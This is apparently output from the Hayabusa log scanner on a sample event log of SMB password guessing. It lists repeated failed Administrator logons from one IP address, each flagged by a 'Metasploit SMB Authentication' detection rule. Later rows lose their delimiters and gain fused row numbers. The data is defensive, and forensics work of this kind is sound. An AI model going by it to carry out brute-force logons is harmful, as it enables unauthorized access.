2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11752016-09-20 01:50:08.735 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11762016-09-20 01:50:08.769 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11772016-09-20 01:50:08.769 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11782016-09-20 01:50:08.804 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11792016-09-20 01:50:08.804 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11802016-09-20 01:50:08.839 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11812016-09-20 01:50:08.839 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11822016-09-20 01:50:08.883 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11832016-09-20 01:50:08.883 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11842016-09-20 01:50:08.916 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11852016-09-20 01:50:08.916 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11862016-09-20 01:50:08.955 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11872016-09-20 01:50:08.955 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11882016-09-20 01:50:08.992 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11892016-09-20 01:50:08.992 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11902016-09-20 01:50:09.028 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11912016-09-20 01:50:09.028 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11922016-09-20 01:50:09.071 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11932016-09-20 01:50:09.071 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11942016-09-20 01:50:09.108 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11952016-09-20 01:50:09.108 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11962016-09-20 01:50:09.144 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11972016-09-20 01:50:09.144 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11982016-09-20 01:50:09.183 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11992016-09-20 01:50:09.183 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12002016-09-20 01:50:09.219 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12012016-09-20 01:50:09.219 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12022016-09-20 01:50:09.255 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12032016-09-20 01:50:09.255 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12042016-09-20 01:50:09.291 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12052016-09-20 01:50:09.291 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12062016-09-20 01:50:09.336 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12072016-09-20 01:50:09.336 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12082016-09-20 01:50:09.364 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12092016-09-20 01:50:09.364 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12102016-09-20 01:50:09.420 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12112016-09-20 01:50:09.420 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12122016-09-20 01:50:09.455 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12132016-09-20 01:50:09.455 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12142016-09-20 01:50:09.500 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12152016-09-20 01:50:09.500 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12162016-09-20 01:50:09.544 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12172016-09-20 01:50:09.544 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12182016-09-20 01:50:09.587 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12192016-09-20 01:50:09.587 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12202016-09-20 01:50:09.631 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12212016-09-20 01:50:09.631 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12222016-09-20 01:50:09.686 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12232016-09-20 01:50:09.686 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12242016-09-20 01:50:09.720 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12252016-09-20 01:50:09.720 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12262016-09-20 01:50:09.760 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12272016-09-20 01:50:09.760 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12282016-09-20 01:50:09.797 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12292016-09-20 01:50:09.797 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12302016-09-20 01:50:09.840 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12312016-09-20 01:50:09.840 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12322016-09-20 01:50:09.876 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12332016-09-20 01:50:09.876 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12342016-09-20 01:50:09.921 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12352016-09-20 01:50:09.921 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12362016-09-20 01:50:09.968 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
